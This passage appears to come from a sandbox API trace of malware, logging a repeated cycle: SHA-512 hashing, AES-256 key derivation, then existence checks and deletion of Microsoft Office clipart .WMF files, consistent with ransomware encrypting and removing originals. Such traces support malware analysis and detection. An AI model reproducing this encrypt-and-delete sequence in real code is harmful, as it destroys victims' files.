(lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19695_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd19695_.wmf")) returned 1 [0187.430] CryptDestroyKey (hKey=0x9ad478) returned 1 [0187.430] wcslen (_String="OK") returned 0x2 [0187.430] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0187.430] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0187.430] CryptDestroyKey (hKey=0x9ad438) returned 1 [0187.430] CryptDestroyHash (hHash=0x9ad738) returned 1 [0187.430] CryptReleaseContext (hProv=0x8e2d58, dwFlags=0x0) returned 1 [0187.654] CryptCreateHash (in: hProv=0x8e35d8, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d444854 | out: phHash=0x1d444854) returned 1 [0187.654] CryptHashData (hHash=0x9ad4f8, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0187.654] CryptDeriveKey (in: hProv=0x8e35d8, Algid=0x6610, hBaseData=0x9ad4f8, dwFlags=0x4, phKey=0x1d444858 | out: phKey=0x1d444858*=0x9ad4b8) returned 1 [0187.654] CryptSetKeyParam (hKey=0x9ad4b8, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0187.654] CryptSetKeyParam (hKey=0x9ad4b8, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0187.654] wcslen (_String="\\\\?\\") returned 0x4 [0187.691] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19827_.WMF") returned 1 [0187.691] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19827_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd19827_.wmf")) returned 1 [0187.693] CryptDestroyKey (hKey=0x9ad2f8) returned 1 [0187.693] wcslen (_String="OK") returned 0x2 [0187.693] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0187.693] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0187.693] CryptDestroyKey (hKey=0x9ad4b8) returned 1 [0187.693] CryptDestroyHash (hHash=0x9ad4f8) returned 1 [0187.693] CryptReleaseContext (hProv=0x8e35d8, dwFlags=0x0) returned 1 [0187.695] CryptCreateHash (in: hProv=0x8e3198, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d44495c | out: phHash=0x1d44495c) returned 1 [0187.695] CryptHashData (hHash=0x9ad538, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0187.695] CryptDeriveKey (in: hProv=0x8e3198, Algid=0x6610, hBaseData=0x9ad538, dwFlags=0x4, phKey=0x1d444960 | out: phKey=0x1d444960*=0x9ad1b8) returned 1 [0187.695] CryptSetKeyParam (hKey=0x9ad1b8, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0187.695] CryptSetKeyParam (hKey=0x9ad1b8, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0187.696] wcslen (_String="\\\\?\\") returned 0x4 [0188.007] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19828_.WMF") returned 1 [0188.008] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19828_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd19828_.wmf")) returned 1 [0188.008] CryptDestroyKey (hKey=0x9ad7b8) returned 1 [0188.008] wcslen (_String="OK") returned 0x2 [0188.008] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0188.008] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0188.008] CryptDestroyKey (hKey=0x9ad1b8) returned 1 [0188.008] CryptDestroyHash (hHash=0x9ad538) returned 1 [0188.008] CryptReleaseContext (hProv=0x8e3198, dwFlags=0x0) returned 1 [0188.010] CryptCreateHash (in: hProv=0x8e3088, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d444944 | out: phHash=0x1d444944) returned 1 [0188.010] CryptHashData (hHash=0x9ad738, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0188.010] CryptDeriveKey (in: hProv=0x8e3088, Algid=0x6610, hBaseData=0x9ad738, dwFlags=0x4, phKey=0x1d444948 | out: phKey=0x1d444948*=0x9ad5f8) returned 1 [0188.010] CryptSetKeyParam (hKey=0x9ad5f8, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0188.010] CryptSetKeyParam (hKey=0x9ad5f8, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0188.010] wcslen (_String="\\\\?\\") returned 0x4 [0188.057] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19986_.WMF") returned 1 [0188.058] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19986_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd19986_.wmf")) returned 1 [0188.058] CryptDestroyKey (hKey=0x9ad5b8) returned 1 [0188.058] wcslen (_String="OK") returned 0x2 [0188.058] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0188.058] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0188.059] CryptDestroyKey (hKey=0x9ad5f8) returned 1 [0188.059] CryptDestroyHash (hHash=0x9ad738) returned 1 [0188.059] CryptReleaseContext (hProv=0x8e3088, dwFlags=0x0) returned 1 [0188.060] CryptCreateHash (in: hProv=0x8e35d8, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d444884 | out: phHash=0x1d444884) returned 1 [0188.060] CryptHashData (hHash=0x9ad4f8, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0188.060] CryptDeriveKey (in: hProv=0x8e35d8, Algid=0x6610, hBaseData=0x9ad4f8, dwFlags=0x4, phKey=0x1d444888 | out: phKey=0x1d444888*=0x9ad1b8) returned 1 [0188.060] CryptSetKeyParam (hKey=0x9ad1b8, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0188.060] CryptSetKeyParam (hKey=0x9ad1b8, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0188.060] wcslen (_String="\\\\?\\") returned 0x4 [0188.212] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19988_.WMF") returned 1 [0188.212] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19988_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd19988_.wmf")) returned 1 [0188.217] CryptDestroyKey (hKey=0x9ad178) returned 1 [0188.217] wcslen (_String="OK") returned 0x2 [0188.217] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0188.217] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0188.217] CryptDestroyKey (hKey=0x9ad1b8) returned 1 [0188.217] CryptDestroyHash (hHash=0x9ad4f8) returned 1 [0188.217] CryptReleaseContext (hProv=0x8e35d8, dwFlags=0x0) returned 1 [0188.219] CryptCreateHash (in: hProv=0x8e3440, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d44474c | out: phHash=0x1d44474c) returned 1 [0188.219] CryptHashData (hHash=0x9ad1f8, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0188.219] CryptDeriveKey (in: hProv=0x8e3440, Algid=0x6610, hBaseData=0x9ad1f8, dwFlags=0x4, phKey=0x1d444750 | out: phKey=0x1d444750*=0x9ad638) returned 1 [0188.219] CryptSetKeyParam (hKey=0x9ad638, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0188.219] CryptSetKeyParam (hKey=0x9ad638, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0188.219] wcslen (_String="\\\\?\\") returned 0x4 [0188.473] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD20013_.WMF") returned 1 [0188.473] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD20013_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd20013_.wmf")) returned 1 [0188.473] CryptDestroyKey (hKey=0x9ad138) returned 1 [0188.473] wcslen (_String="OK") returned 0x2 [0188.473] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0188.474] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0188.474] CryptDestroyKey (hKey=0x9ad638) returned 1 [0188.474] CryptDestroyHash (hHash=0x9ad1f8) returned 1 [0188.474] CryptReleaseContext (hProv=0x8e3440, dwFlags=0x0) returned 1 [0188.475] CryptCreateHash (in: hProv=0x8e3660, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d4449d4 | out: phHash=0x1d4449d4) returned 1 [0188.475] CryptHashData (hHash=0x9ad1b8, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0188.475] CryptDeriveKey (in: hProv=0x8e3660, Algid=0x6610, hBaseData=0x9ad1b8, dwFlags=0x4, phKey=0x1d4449d8 | out: phKey=0x1d4449d8*=0x9ad7b8) returned 1 [0188.475] CryptSetKeyParam (hKey=0x9ad7b8, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0188.475] CryptSetKeyParam (hKey=0x9ad7b8, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0188.475] wcslen (_String="\\\\?\\") returned 0x4 [0188.552] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00008_.WMF") returned 1 [0188.552] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00008_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00008_.wmf")) returned 1 [0188.553] CryptDestroyKey (hKey=0x9ad438) returned 1 [0188.553] wcslen (_String="OK") returned 0x2 [0188.553] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0188.553] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0188.553] CryptDestroyKey (hKey=0x9ad7b8) returned 1 [0188.553] CryptDestroyHash (hHash=0x9ad1b8) returned 1 [0188.553] CryptReleaseContext (hProv=0x8e3660, dwFlags=0x0) returned 1 [0188.555] CryptCreateHash (in: hProv=0x8e3330, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d44483c | out: phHash=0x1d44483c) returned 1 [0188.555] CryptHashData (hHash=0x9ad1f8, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0188.555] CryptDeriveKey (in: hProv=0x8e3330, Algid=0x6610, hBaseData=0x9ad1f8, dwFlags=0x4, phKey=0x1d444840 | out: phKey=0x1d444840*=0x9ad338) returned 1 [0188.555] CryptSetKeyParam (hKey=0x9ad338, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0188.555] CryptSetKeyParam (hKey=0x9ad338, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0188.555] wcslen (_String="\\\\?\\") returned 0x4 [0188.584] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00012_.WMF") returned 1 [0188.584] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00012_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00012_.wmf")) returned 1 [0188.585] CryptDestroyKey (hKey=0x9ad238) returned 1 [0188.585] wcslen (_String="OK") returned 0x2 [0188.585] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0188.585] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0188.585] CryptDestroyKey (hKey=0x9ad338) returned 1 [0188.585] CryptDestroyHash (hHash=0x9ad1f8) returned 1 [0188.585] CryptReleaseContext (hProv=0x8e3330, dwFlags=0x0) returned 1 [0188.586] CryptCreateHash (in: hProv=0x8e3550, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d44477c | out: phHash=0x1d44477c) returned 1 [0188.586] CryptHashData (hHash=0x9ad4b8, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0188.586] CryptDeriveKey (in: hProv=0x8e3550, Algid=0x6610, hBaseData=0x9ad4b8, dwFlags=0x4, phKey=0x1d444780 | out: phKey=0x1d444780*=0x9ad338) returned 1 [0188.587] CryptSetKeyParam (hKey=0x9ad338, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0188.587] CryptSetKeyParam (hKey=0x9ad338, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0188.587] wcslen (_String="\\\\?\\") returned 0x4 [0188.698] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00045_.WMF") returned 1 [0188.698] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00045_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00045_.wmf")) returned 1 [0188.700] CryptDestroyKey (hKey=0x9ad2b8) returned 1 [0188.700] wcslen (_String="OK") returned 0x2 [0188.700] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0188.700] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0188.700] CryptDestroyKey (hKey=0x9ad338) returned 1 [0188.700] CryptDestroyHash (hHash=0x9ad4b8) returned 1 [0188.700] CryptReleaseContext (hProv=0x8e3550, dwFlags=0x0) returned 1 [0188.702] CryptCreateHash (in: hProv=0x8e3550, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d44483c | out: phHash=0x1d44483c) returned 1 [0188.702] CryptHashData (hHash=0x9ad678, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0188.702] CryptDeriveKey (in: hProv=0x8e3550, Algid=0x6610, hBaseData=0x9ad678, dwFlags=0x4, phKey=0x1d444840 | out: phKey=0x1d444840*=0x9ad578) returned 1 [0188.702] CryptSetKeyParam (hKey=0x9ad578, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0188.702] CryptSetKeyParam (hKey=0x9ad578, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0188.703] wcslen (_String="\\\\?\\") returned 0x4 [0188.715] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00098_.WMF") returned 1 [0188.715] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00098_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00098_.wmf")) returned 1 [0188.717] CryptDestroyKey (hKey=0x9ad838) returned 1 [0188.717] wcslen (_String="OK") returned 0x2 [0188.717] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0188.717] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0188.717] CryptDestroyKey (hKey=0x9ad578) returned 1 [0188.717] CryptDestroyHash (hHash=0x9ad678) returned 1 [0188.717] CryptReleaseContext (hProv=0x8e3550, dwFlags=0x0) returned 1 [0188.719] CryptCreateHash (in: hProv=0x8e3a18, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d444824 | out: phHash=0x1d444824) returned 1 [0188.719] CryptHashData (hHash=0x9ad238, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0188.719] CryptDeriveKey (in: hProv=0x8e3a18, Algid=0x6610, hBaseData=0x9ad238, dwFlags=0x4, phKey=0x1d444828 | out: phKey=0x1d444828*=0x9ad5b8) returned 1 [0188.719] CryptSetKeyParam (hKey=0x9ad5b8, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0188.719] CryptSetKeyParam (hKey=0x9ad5b8, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0188.719] wcslen (_String="\\\\?\\") returned 0x4 [0188.734] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00105_.WMF") returned 1 [0188.734] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00105_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00105_.wmf")) returned 1 [0188.735] CryptDestroyKey (hKey=0x9ad278) returned 1 [0188.735] wcslen (_String="OK") returned 0x2 [0188.735] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0188.735] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0188.735] CryptDestroyKey (hKey=0x9ad5b8) returned 1 [0188.735] CryptDestroyHash (hHash=0x9ad238) returned 1 [0188.736] CryptReleaseContext (hProv=0x8e3a18, dwFlags=0x0) returned 1 [0188.738] CryptCreateHash (in: hProv=0x8e3198, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d444794 | out: phHash=0x1d444794) returned 1 [0188.738] CryptHashData (hHash=0x9ad138, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0188.738] CryptDeriveKey (in: hProv=0x8e3198, Algid=0x6610, hBaseData=0x9ad138, dwFlags=0x4, phKey=0x1d444798 | out: phKey=0x1d444798*=0x9ad238) returned 1 [0188.738] CryptSetKeyParam (hKey=0x9ad238, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0188.738] CryptSetKeyParam (hKey=0x9ad238, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0188.738] wcslen (_String="\\\\?\\") returned 0x4 [0188.758] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00122_.WMF") returned 1 [0188.758] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00122_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00122_.wmf")) returned 1 [0188.760] CryptDestroyKey (hKey=0x9ad2b8) returned 1 [0188.760] wcslen (_String="OK") returned 0x2 [0188.760] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0188.760] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0188.760] CryptDestroyKey (hKey=0x9ad238) returned 1 [0188.760] CryptDestroyHash (hHash=0x9ad138) returned 1 [0188.760] CryptReleaseContext (hProv=0x8e3198, dwFlags=0x0) returned 1 [0188.762] CryptCreateHash (in: hProv=0x8e3220, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d444974 | out: phHash=0x1d444974) returned 1 [0188.762] CryptHashData (hHash=0x9ad138, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0188.762] CryptDeriveKey (in: hProv=0x8e3220, Algid=0x6610, hBaseData=0x9ad138, dwFlags=0x4, phKey=0x1d444978 | out: phKey=0x1d444978*=0x9ad1f8) returned 1 [0188.762] CryptSetKeyParam (hKey=0x9ad1f8, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0188.762] CryptSetKeyParam (hKey=0x9ad1f8, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0188.762] wcslen (_String="\\\\?\\") returned 0x4 [0188.881] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00130_.WMF") returned 1 [0188.881] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00130_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00130_.wmf")) returned 1 [0188.883] CryptDestroyKey (hKey=0x9ad738) returned 1 [0188.883] wcslen (_String="OK") returned 0x2 [0188.883] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0188.883] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0188.883] CryptDestroyKey (hKey=0x9ad1f8) returned 1 [0188.883] CryptDestroyHash (hHash=0x9ad138) returned 1 [0188.883] CryptReleaseContext (hProv=0x8e3220, dwFlags=0x0) returned 1 [0188.885] CryptCreateHash (in: hProv=0x8e3330, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d4448b4 | out: phHash=0x1d4448b4) returned 1 [0188.885] CryptHashData (hHash=0x9ad278, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0188.885] CryptDeriveKey (in: hProv=0x8e3330, Algid=0x6610, hBaseData=0x9ad278, dwFlags=0x4, phKey=0x1d4448b8 | out: phKey=0x1d4448b8*=0x9ad178) returned 1 [0188.885] CryptSetKeyParam (hKey=0x9ad178, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0188.885] CryptSetKeyParam (hKey=0x9ad178, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0188.885] wcslen (_String="\\\\?\\") returned 0x4 [0189.001] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00148_.WMF") returned 1 [0189.001] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00148_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00148_.wmf")) returned 1 [0189.002] CryptDestroyKey (hKey=0x9ad2f8) returned 1 [0189.002] wcslen (_String="OK") returned 0x2 [0189.002] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0189.002] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0189.002] CryptDestroyKey (hKey=0x9ad178) returned 1 [0189.002] CryptDestroyHash (hHash=0x9ad278) returned 1 [0189.002] CryptReleaseContext (hProv=0x8e3330, dwFlags=0x0) returned 1 [0189.004] CryptCreateHash (in: hProv=0x8e3088, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d4448cc | out: phHash=0x1d4448cc) returned 1 [0189.004] CryptHashData (hHash=0x9ad538, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0189.004] CryptDeriveKey (in: hProv=0x8e3088, Algid=0x6610, hBaseData=0x9ad538, dwFlags=0x4, phKey=0x1d4448d0 | out: phKey=0x1d4448d0*=0x9ad338) returned 1 [0189.004] CryptSetKeyParam (hKey=0x9ad338, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0189.004] CryptSetKeyParam (hKey=0x9ad338, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0189.004] wcslen (_String="\\\\?\\") returned 0x4 [0189.020] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00152_.WMF") returned 1 [0189.020] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00152_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00152_.wmf")) returned 1 [0189.021] CryptDestroyKey (hKey=0x9ad5f8) returned 1 [0189.021] wcslen (_String="OK") returned 0x2 [0189.021] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0189.021] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0189.021] CryptDestroyKey (hKey=0x9ad338) returned 1 [0189.021] CryptDestroyHash (hHash=0x9ad538) returned 1 [0189.021] CryptReleaseContext (hProv=0x8e3088, dwFlags=0x0) returned 1 [0189.022] CryptCreateHash (in: hProv=0x8e3550, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d444974 | out: phHash=0x1d444974) returned 1 [0189.022] CryptHashData (hHash=0x9ad178, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0189.022] CryptDeriveKey (in: hProv=0x8e3550, Algid=0x6610, hBaseData=0x9ad178, dwFlags=0x4, phKey=0x1d444978 | out: phKey=0x1d444978*=0x9ad438) returned 1 [0189.022] CryptSetKeyParam (hKey=0x9ad438, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0189.022] CryptSetKeyParam (hKey=0x9ad438, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0189.022] wcslen (_String="\\\\?\\") returned 0x4 [0189.054] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00194_.WMF") returned 1 [0189.054] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00194_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00194_.wmf")) returned 1 [0189.055] CryptDestroyKey (hKey=0x9ad6b8) returned 1 [0189.055] wcslen (_String="OK") returned 0x2 [0189.055] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0189.055] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0189.055] CryptDestroyKey (hKey=0x9ad438) returned 1 [0189.055] CryptDestroyHash (hHash=0x9ad178) returned 1 [0189.055] CryptReleaseContext (hProv=0x8e3550, dwFlags=0x0) returned 1 [0189.057] CryptCreateHash (in: hProv=0x8e2de0, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d4448b4 | out: phHash=0x1d4448b4) returned 1 [0189.057] CryptHashData (hHash=0x9ad8b8, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0189.057] CryptDeriveKey (in: hProv=0x8e2de0, Algid=0x6610, hBaseData=0x9ad8b8, dwFlags=0x4, phKey=0x1d4448b8 | out: phKey=0x1d4448b8*=0x9ad238) returned 1 [0189.057] CryptSetKeyParam (hKey=0x9ad238, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0189.057] CryptSetKeyParam (hKey=0x9ad238, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0189.057] wcslen (_String="\\\\?\\") returned 0x4 [0189.122] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00195_.WMF") returned 1 [0189.122] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00195_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00195_.wmf")) returned 1 [0189.123] CryptDestroyKey (hKey=0x9ad7f8) returned 1 [0189.124] wcslen (_String="OK") returned 0x2 [0189.124] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0189.124] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0189.124] CryptDestroyKey (hKey=0x9ad238) returned 1 [0189.124] CryptDestroyHash (hHash=0x9ad8b8) returned 1 [0189.124] CryptReleaseContext (hProv=0x8e2de0, dwFlags=0x0) returned 1 [0189.127] CryptCreateHash (in: hProv=0x8e3aa0, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d444794 | out: phHash=0x1d444794) returned 1 [0189.127] CryptHashData (hHash=0x9ad4f8, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0189.127] CryptDeriveKey (in: hProv=0x8e3aa0, Algid=0x6610, hBaseData=0x9ad4f8, dwFlags=0x4, phKey=0x1d444798 | out: phKey=0x1d444798*=0x9ad1b8) returned 1 [0189.127] CryptSetKeyParam (hKey=0x9ad1b8, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0189.127] CryptSetKeyParam (hKey=0x9ad1b8, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0189.127] wcslen (_String="\\\\?\\") returned 0x4 [0189.211] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00234_.WMF") returned 1 [0189.211] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00234_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00234_.wmf")) returned 1 